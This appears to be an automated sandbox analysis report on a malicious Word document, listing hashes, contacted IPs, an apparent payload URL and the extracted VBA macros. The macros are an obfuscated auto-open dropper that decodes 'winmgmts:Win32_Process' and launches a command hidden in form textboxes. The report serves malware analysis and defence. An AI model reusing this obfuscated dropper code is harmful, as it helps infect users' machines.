SHA1:	A02DBBFB4A5627CA061BD0608815F6288263C282
SHA-256:	63B8414CA7924A8ADAD92175E7EB163CB257401701D09AF07C97AC32EA454065
SHA-512:	BCD94B474CBB43776EB0CFFBA9578801DFE65254F613C8172352CD2E0FB702835899E4BB285E8C512823C9DAADD970567B921D22DD1F728F236FB4D7EB48BD3C
Malicious:	false
Preview:	.user.............................................l.u.k.e.t.a.y.l.o.r.....Uf.........$...".g..................................................>.........p.D.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\728H4QLN5MVJAX6C10J2.temp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Size (bytes):	8016
Entropy (8bit):	3.5568338840501657
Encrypted:	false
MD5:	CE852F8A187F08975F76875C4837AC96
SHA1:	44E5086B25B75B5480960D5F50600CB801E787A0
SHA-256:	627822DA4BBD61056220812CABE1C9AC0F8FA9257E19ED615E5C2C59E99C475E
SHA-512:	C06800C83BD0B3918735BDE5686960B9EB89178DC9CBBE1EA2C202EBABC12CB5B2B93AB24706F14502C11873FCF4DFE965AD0937F3B46A906B628D62CCE491FE
Malicious:	false
Preview:	...................................FL..................F.".. ....b..>...#...>...#...>...k............................P.O. .:i.....+00.../C:\...................\.1.....lF.R. PROGRA~2..D.......:..lF.R.........................P.r.o.g.r.a.m.D.a.t.a.....X.1......H]:. MICROS~1..@.......:...H]:.........................M.i.c.r.o.s.o.f.t.....R.1.....M>O@. Windows.<.......:..M>O@...(.....................W.i.n.d.o.w.s.......1.....~F\O..STARTM~1..j.......:..~F\O...2...............@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......I.k..Programs..f.......:...I.k...3...............<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1......I.h..ACCESS~1..l.......:..M>Z@...4...............B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:.%..WINDOW~1..R.......:.&.:.%...8.....................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:.& .WINDOW~1.LNK..Z.......:.&.:.&....)....................W.i.n.d.o.w.s.

C:\Users\user\Desktop\~$ovo_documento_2019.09.20.doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	162
Entropy (8bit):	2.206542077975962
Encrypted:	false
MD5:	D00AF25948EE6C7F7AB78C2C16AACD3B
SHA1:	A02DBBFB4A5627CA061BD0608815F6288263C282
SHA-256:	63B8414CA7924A8ADAD92175E7EB163CB257401701D09AF07C97AC32EA454065
SHA-512:	BCD94B474CBB43776EB0CFFBA9578801DFE65254F613C8172352CD2E0FB702835899E4BB285E8C512823C9DAADD970567B921D22DD1F728F236FB4D7EB48BD3C
Malicious:	false
Preview:	.user.............................................l.u.k.e.t.a.y.l.o.r.....Uf.........$...".g..................................................>.........p.D.

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
sabiosdelamor.co	198.49.65.242	true	false	0%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://181.164.8.25/attrib/schema/pdf/merge/	sortedwatched.exe, 0000000C.00000002.559572605.00224000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://181.164.8.25/attrib/schema/pdf/merge/n	sortedwatched.exe, 0000000C.00000002.559572605.00224000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Country	ASN	ASN Name	Malicious
149.167.86.174	Australia	45510	unknown	false
198.49.65.242	United States	33182	unknown	false
181.164.8.25	Argentina	10318	unknown	false

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Joseph Fritsch, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Sep 20 08:30:00 2019, Last Saved Time/Date: Fri Sep 20 08:30:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0
Entropy (8bit):	6.7270076216244306
TrID:	Microsoft Word document (32009/1) 52.89% Microsoft Word document (old ver.) (19008/1) 31.41% Generic OLE2 / Multistream Compound File (8008/1) 13.23% Java Script embedded in Visual Basic Script (1500/0) 2.48%
File name:	Nuovo_documento_2019.09.20.doc
File size:	236544
MD5:	1b9714114ff735277c8981c84d4f2393
SHA1:	beacaf09fb062e5f3e986ee294ed5ec97fc26c12
SHA256:	beb82d8b2429911fffe39457bd4bb8bbe033ca34826df10b291fa74b33c7275a
SHA512:	49f4a4e8de51483e8f5500e42be792bec9e26d5e583d88011d9dc732a5a504adb4ac34cccf2d3382b802d871acf038063cc850031c2ae910b55413d2a2358070
SSDEEP:	6144:+d96T4Rci2R9JtXvIj++PWVI1dGLkIV7NSU4jJntATfDDBpp:+d96T4Rci2R9JtXvH+PWVI1SXV7NSU4+
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "Nuovo_documento_2019.09.20.doc"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Office Word
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	True
Flash Objects Count:	0
Contains VBA Macros:	True

Summary
Code Page:	1252
Title:
Subject:
Author:	Joseph Fritsch
Keywords:
Comments:
Template:	Normal.dotm
Last Saved By:
Revion Number:	1
Total Edit Time:	0
Create Time:	2019-09-20 07:30:00
Last Saved Time:	2019-09-20 07:30:00
Number of Pages:	1
Number of Words:	95
Number of Characters:	547
Creating Application:	Microsoft Office Word
Security:	0

Document Summary
Document Code Page:	1252
Number of Lines:	4
Number of Paragraphs:	1
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	1048576

Streams with VBA

VBA File Name: JIodCjfv.bas, Stream Size: 5179

General
Stream Path:	Macros/VBA/JIodCjfv
VBA File Name:	JIodCjfv.bas
Stream Size:	5179
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . C . . . . . . . . . . . _ 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 94 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 9b 02 00 00 43 0d 00 00 00 00 00 00 01 00 00 00 5f 31 c5 db 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
CDate(uDNHZRDB)
Fix(fIDOjLzQ)
Until
EnzDZGz
Resume
CStr(rbJdmEz))
whapPJb
FnLI_N
OuoioTjO
qcOQjrD
CStr(ruLzmW))
CStr(uJwlJz))
YGuUZX
RecentFiles.Count
CDHkaIfU
(ATaMOL
Sin(WrztcmHX)
(HZGOlw
MLzjlI
DtWubh
jQhhhQSc
uNL_Qm
CStr(NWWiIQQi))
EhPXLwZr
zaBTww
Sin(dOmmAiqP)
oSsOXl
FIHNkM
CStr(bQrbmIrJ)
ZfdJRPiY
FJHJlhv
CDate(OkzDrVT)
Fix(mwv_hRR)
Error
sRRzpU
dYFvGWI
mzTRZThP
oihAvpA
Attribute
autoopen()
DkkCTnu
oPMvTw
VB_Name
"JIodCjfv"
Function
Iofqhj
OObwzR
cCsukAJS
wqLToroz
FnZwmD_A
CKCNjv
qNXwDA
rkbEFdX
FXnzwzC
sNGNZi
AuOCYR
hUPJJL
YcqUOCsQ
kULEiwf

VBA Code

Attribute VB_Name = "JIodCjfv"
Sub autoopen()
   On Error Resume Next
   Set mna = xqmm6672
   Do
      If wqLToroz = Na5naWHG Then
         PhaBus1_ = Tan(1141)
      End If
         qNXwDA = ol1JHUw * CDate(tHW47ffa) / Hj82oV / CDHkaIfU + (HZGOlw / CStr(EO5s3Wov) / 3 * CStr(ruLzmW))
      For Each oSsOXl In NAJ70I4
         OEVLv8 = Xfh3Uz - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(ZBpK33S) - 6977 - EnmJEs2 - RRZ6BWC * Sin(Frj8OZbd)
      Next
Loop Until fXaz2u = D5Yzqc
If RecentFiles.Count > 3 Then
dztj37
End If
   On Error Resume Next
   Set mna = xqmm6672
   Do
      If whapPJb = ow8oQWti Then
         cc6fSzI = Tan(1141)
      End If
         nI9cqO = YcqUOCsQ * CDate(OkzDrVT) / CBH1HB / mzTRZThP + (ATaMOL / CStr(bQrbmIrJ) / 3 * CStr(SnjS4W9c))
      For Each sRRzpU In i2w7lPf
         QMKkQZu4 = lbDPzY6 - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(w3wS1B) - 6977 - zaBTww - Mntl4i7 * Sin(dOmmAiqP)
      Next
Loop Until Fi6Vjz = XZJ7qqlh
End Sub
Function R3tnEz2D()
ZfdJRPiY = kULEiwf + DAbbE9mG
   On Error Resume Next
   Set mna = xqmm6672
   Do
      If f1ocqu = wZfG2P Then
         EE3NY5nB = Tan(1141)
      End If
         jQhhhQSc = DtWubh * CDate(NdN1rET) / NosNmj4 / kZ3OzYB + (TtIw36Hv / CStr(pkcNH7C) / 3 * CStr(rbJdmEz))
      For Each BpzwCL7 In ZwwF3I
         oPMvTw = qcOQjrD - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(mwv_hRR) - 6977 - cCsukAJS - T4t4PSN * Sin(WrztcmHX)
      Next
Loop Until N06UkOi = sNGNZi
Set R3tnEz2D = CreateObject(lTzGN9z + UMvDUH(ThisDocument.QFa7Tzv) + RI34Jc)
   On Error Resume Next
   Set mna = xqmm6672
   Do
      If ZD4NzNKp = dYFvGWI Then
         FIHNkM = Tan(1141)
      End If
         Jd7zMAU_ = OObwzR * CDate(EIw3Db08) / T1TAVR_L / SXvvII2T + (S1hkHVH / CStr(a1QujnI) / 3 * CStr(uJwlJz))
      For Each TCu6kpE7 In Pt5_Krw
         FnLI_N = mjvrs8a - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(df7KLz) - 6977 - rLX5_E - qhEL6us * Sin(RWp2lz)
      Next
Loop Until DHQs26 = CKCNjv
R3tnEz2D.ShowWindow! = ZfdJRPiY
   On Error Resume Next
   Set mna = xqmm6672
   Do
      If hUPJJL = oihAvpA Then
         CCj5oD = Tan(1141)
      End If
         YGuUZX = DkkCTnu * CDate(mQZoi014) / uNL_Qm / EhPXLwZr + (fzbTzG6 / CStr(T6H6cL) / 3 * CStr(U4kTbL8o))
      For Each SFnP24Y In rkbEFdX
         wnwME5Aw = Iofqhj - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(fIDOjLzQ) - 6977 - qf2EbLqm - AuOCYR * Sin(R65fhvwm)
      Next
Loop Until FnZwmD_A = KUA7zY
   On Error Resume Next
   Set mna = xqmm6672
   Do
      If ls9iOFd = EnzDZGz Then
         iYU6MXV = Tan(1141)
      End If
         JK1i0j = AtZoc6 * CDate(uDNHZRDB) / MLzjlI / OuoioTjO + (h0IdWK / CStr(Gtz6Hz) / 3 * CStr(NWWiIQQi))
      For Each FWa6lK In S10zzpNS
         FXnzwzC = j7Ysl2IC - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(LInuIc64) - 6977 - jR1PlbP - cn3bSi * Sin(GY7qmRZw)
      Next
Loop Until hfW56jn = FJHJlhv
End Function

VBA File Name: ThisDocument.cls, Stream Size: 3527

General
Stream Path:	Macros/VBA/ThisDocument
VBA File Name:	ThisDocument.cls
Stream Size:	3527
Data ASCII:	. . . . . . . . . # . . . . . . . . . . . j . . . h . . . . . . . . . . . . . . . _ 1 } . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 . . % . . G . . . . D . . . . . . . . . . O . P . . # . z Q . . . . . . . . . . . . . . . . . . . . T . . $ . . \\ H . Y 2 . . Y . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . F i k b d Q Z , 0 , 0 , M S F o r m s , T e x t B o x . N 2 S p O i I D , 1 , 1 , M S F o r m s , T e x t B
Data Raw:	01 16 01 00 06 a5 03 00 00 23 0a 00 00 89 03 00 00 b7 04 00 00 6a 0a 00 00 68 0b 00 00 bc 0b 00 00 00 00 00 00 01 00 00 00 5f 31 7d ae 00 00 ff ff e3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff dc 00 ff ff 00 00 bf 39 1c df 25 d0 fd 47 8a 89 89 94 44 c4 cb f0 d6 d9 13 8d da a9 01 4f 90 50 92 d0 23 07 7a 51 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
"FikbdQZ,
VB_Name
VB_Creatable
"hjjzVw,
VB_Exposed
TextBox"
"uXSvzY,
VB_Customizable
"ThisDocument"
VB_Control
VB_TemplateDerived
MSForms,
False
"GoWsRhk,
Attribute
"zJWspwz,
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
"cZDuVz,
"qijkYG,

VBA Code

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "FikbdQZ, 0, 0, MSForms, TextBox"
Attribute VB_Control = "N2SpOiID, 1, 1, MSForms, TextBox"
Attribute VB_Control = "mwXI7m, 2, 2, MSForms, TextBox"
Attribute VB_Control = "P83AcXTu, 3, 3, MSForms, TextBox"
Attribute VB_Control = "QFa7Tzv, 4, 4, MSForms, TextBox"
Attribute VB_Control = "TCRM9sqj, 5, 5, MSForms, TextBox"
Attribute VB_Control = "VEYjp2, 6, 6, MSForms, TextBox"
Attribute VB_Control = "VHfL_K2S, 7, 7, MSForms, TextBox"
Attribute VB_Control = "w6kwiq, 8, 8, MSForms, TextBox"
Attribute VB_Control = "hjjzVw, 9, 9, MSForms, TextBox"
Attribute VB_Control = "cZDuVz, 10, 10, MSForms, TextBox"
Attribute VB_Control = "JSEp1Hh, 11, 11, MSForms, TextBox"
Attribute VB_Control = "uXSvzY, 12, 12, MSForms, TextBox"
Attribute VB_Control = "GoWsRhk, 13, 13, MSForms, TextBox"
Attribute VB_Control = "zJWspwz, 14, 14, MSForms, TextBox"
Attribute VB_Control = "kE4iQQr, 15, 15, MSForms, TextBox"
Attribute VB_Control = "TRF9Wz, 16, 16, MSForms, TextBox"
Attribute VB_Control = "qijkYG, 17, 17, MSForms, TextBox"
Attribute VB_Control = "btn5hVS, 18, 18, MSForms, TextBox"
Attribute VB_Control = "GUl0LE, 19, 19, MSForms, TextBox"

VBA File Name: snLF1V.bas, Stream Size: 5388

General
Stream Path:	Macros/VBA/snLF1V
VBA File Name:	snLF1V.bas
Stream Size:	5388
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . _ 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 bc 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff c3 02 00 00 db 0d 00 00 00 00 00 00 01 00 00 00 5f 31 e8 9a 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
XzsVHACu
aGJjAH
Until
Resume
mWYlNTFO
wDZDIUTV
MAPHFj
tcDLLb
YAHvQ_
Sin(CmXBWjb)
YjRQrq
zQkMRi
UMvDUH(jNQUnno)
ZNRIEN
UMvDUH
Fix(FRqJIU)
huhEoJG
EqHGmqzs
CDate(fCMUHn)
WiwqHbr
CStr(GdQwslU)
JSjBjs
zcazMGDf
MSfBRT
ojvDCQi
WLAEkzsu
Sin(cISYkJs)
wMBYtY
nkfcdqD
HnhIwa
(pSZQnNn
Replace(jNQUnno,
UPMZSQ
HpAvVal
Sin(mjjrHIf)
Error
Attribute
HV_KNz
jMCQik
dpjKqtAS
VB_Name
tqXjFCw
PFAGKSc
CStr(FfJUME)
Function
m_MLhXX
rZcdZKRX
busmGEX
wWOoNnTo
diSWXniz
CDate(lsaWRUr)
UMvDUH(ThisDocument.zJWspwz
pUBdAcb
cLEAWn
CStr(uBRAVT))
CStr(wlzHbq))
Fix(jYQWvaN)
ZKnIZEfd,

VBA Code

Attribute VB_Name = "snLF1V"
Function dztj37()
   On Error Resume Next
   Set mna = xqmm6672
   Do
      If M3oCwG = PFAGKSc Then
         HnhIwa = Tan(1141)
      End If
         R6wTtT = Btc0KuW * CDate(fCMUHn) / pUBdAcb / WLAEkzsu + (z5_aQ54 / CStr(q2NS516) / 3 * CStr(uBRAVT))
      For Each jMCQik In tkw6vj
         CzAN5H = oc2GT0i - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(FRqJIU) - 6977 - MAPHFj - A9hSFQf9 * Sin(Bt4u6CG)
      Next
Loop Until PcG7it_ = zir7hM
kMmT3s = vq219c + UMvDUH(ThisDocument.zJWspwz + ThisDocument.VHfL_K2S) + YAHvQ_
   On Error Resume Next
   Set mna = xqmm6672
   Do
      If LXv84MXp = JSjBjs Then
         rZcdZKRX = Tan(1141)
      End If
         wD6C32mJ = TAw0Fzm * CDate(C0DzNIbd) / dpjKqtAS / iaXsMY1 + (TniCd0t / CStr(k5bY2L) / 3 * CStr(t1HQFfiz))
      For Each fVn1T1_ In BnCM82w
         zQkMRi = ZNRIEN - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(Ghn4llZ) - 6977 - UF1nKaU6 - wDZDIUTV * Sin(L8Zz21)
      Next
Loop Until lnY3HW = jXUw9Oz

CreateObject(UMvDUH("IuH3IuH3wIuH3iIuH3nmgIuH3mtIuH3sIuH3IuH3:IuH3WIuH3IuH3iIuH3n3IuH32_PIuH3roIuH3cIuH3eIuH3ssIuH3")).Create kMmT3s, ZKnIZEfd, R3tnEz2D, khjUo3du
   On Error Resume Next
   Set mna = xqmm6672
   Do
      If wWOoNnTo = MSfBRT Then
         QvB9VD = Tan(1141)
      End If
         z8FYLah = z5liGH * CDate(TuYSA6) / KWit9B / tqXjFCw + (pSZQnNn / CStr(wT5D9BcE) / 3 * CStr(wMR9tP))
      For Each mjHV7os In LDjJ6zM
         XzsVHACu = bUqA9z5 - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(jYQWvaN) - 6977 - vDZE63w - UYGTL2Tr * Sin(CmXBWjb)
      Next
Loop Until X975_m = zcazMGDf

   On Error Resume Next
   Set mna = xqmm6672
   Do
      If Pu1R8IUO = aXF2_4qQ Then
         EaYS6RQw = Tan(1141)
      End If
         nkfcdqD = tcDLLb * CDate(lsaWRUr) / ShWp3jNB / tnXUzJ0O + (MM3V6h / CStr(GdQwslU) / 3 * CStr(j_72KM))
      For Each mWYlNTFO In HpAvVal
         iE7w_S0 = cLEAWn - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(lA6KKk) - 6977 - J3J3pfPR - hzkYTP82 * Sin(cISYkJs)
      Next
Loop Until Sff8wzaz = B8wUj_W
End Function
Function UMvDUH(jNQUnno)
   On Error Resume Next
   Set mna = xqmm6672
   Do
      If CP2pOzYD = m_MLhXX Then
         UPMZSQ = Tan(1141)
      End If
         busmGEX = huhEoJG * CDate(az_UGd0) / a21jZbL3 / pn7zEK + (N0vGGku / CStr(fMoOoWO3) / 3 * CStr(EUG4z12))
      For Each d_7JYztz In nP1obkp
         HRs8wo = HG0RQi - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(zqDQZ7) - 6977 - YjRQrq - Hz5p3D * Sin(mjjrHIf)
      Next
Loop Until Xb5lam = diSWXniz
UMvDUH = Replace(jNQUnno, Replace("09NhI09NhuH09Nh309Nh", "09Nh", ""), "")
   On Error Resume Next
   Set mna = xqmm6672
   Do
      If wMBYtY = O_vT8j Then
         mEczi1 = Tan(1141)
      End If
         ViXQd2j8 = EqHGmqzs * CDate(p2VQvUjT) / nJES0LA / WiwqHbr + (XzCzPS7 / CStr(FfJUME) / 3 * CStr(wlzHbq))
      For Each HV_KNz In t3Fh05z
         w5XZFSu = aGJjAH - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(F97Z_Sb) - 6977 - Q0hGCzd - ojvDCQi * Sin(wNX30a)
      Next
Loop Until qaB0m7mo = E9cRqzhV
End Function

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	114
Entropy:	4.2359563651
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 280

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	280
Entropy:	2.41598942003
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 416

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	416
Entropy:	3.20037592743
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . X . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 70 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 58 01 00 00 05 00 00 00 b0 00 00 00 06 00 00 00 bc 00 00 00 07 00 00 00 c8 00 00 00 08 00 00 00 dc 00 00 00 09 00 00 00 e8 00 00 00

Stream Path: 1Table, File Type: data, Stream Size: 8131

General
Stream Path:	1Table
File Type:	data
Stream Size:	8131
Entropy:	5.68194048366
Base64 Encoded:	True
Data ASCII:	. . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
Data Raw:	1e 06 11 00 12 00 01 00 78 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00

Stream Path: Data, File Type: data, Stream Size: 148800

General
Stream Path:	Data
File Type:	data
Stream Size:	148800
Entropy:	7.4746505717
Base64 Encoded:	True
Data ASCII:	. . . . D . d . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . R . . . . . . . c . . . $ . . . . . . . . . . A . . . . ? . . . . . . . . . . . . . . . . . ? . . . . . 3 . " . . . . . . . . . ` . . . . . . . ? . . . . . . . . . . . . . . . . . 2 . . . U . . . . . V L . . . . . . k . . v . . . } . . 1 . . . . . . . D . . . . . k . ` ! . . ) . . . V L . . . . . . k . . v . . . } . . . . . . . . . . . . . .
Data Raw:	0b 02 00 00 44 00 64 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 0f 00 e8 03 e8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 62 00 00 00 b2 04 0a f0 08 00 00 00 52 04 00 00 00 0a 00 00 63 00 0b f0 24 00 00 00 7f 00 80 00 80 00 04 41 15 00 00 00 3f 01 00 00 06 00 bf 01 0c 00 1f 00 ff 01 00 00

Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 589

General
Stream Path:	Macros/PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	589
Entropy:	5.38649124242
Base64 Encoded:	True
Data ASCII:	I D = " { 5 2 C 1 0 B 4 C - A E 1 B - 4 6 9 F - B D 6 9 - 1 5 7 4 B C A 3 5 2 7 B } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . M o d u l e = s n L F 1 V . . M o d u l e = J I o d C j f v . . H e l p F i l e = " m h C 4 O 0 H p " . . E x e N a m e 3 2 = " m c z 5 Y Q o 6 " . . N a m e = " R q s D M _ " . . H e l p C o n t e x t I D = " 0 " . . D e s c r i p t i o n = " X a 4 G a A " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " D 3 D 1 2 2 4 F
Data Raw:	49 44 3d 22 7b 35 32 43 31 30 42 34 43 2d 41 45 31 42 2d 34 36 39 46 2d 42 44 36 39 2d 31 35 37 34 42 43 41 33 35 32 37 42 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 73 6e 4c 46 31 56 0d 0a 4d 6f 64 75 6c 65 3d 4a 49 6f 64 43 6a 66 76 0d 0a 48 65 6c 70 46 69 6c 65 3d 22 6d 68 43 34 4f 30 48

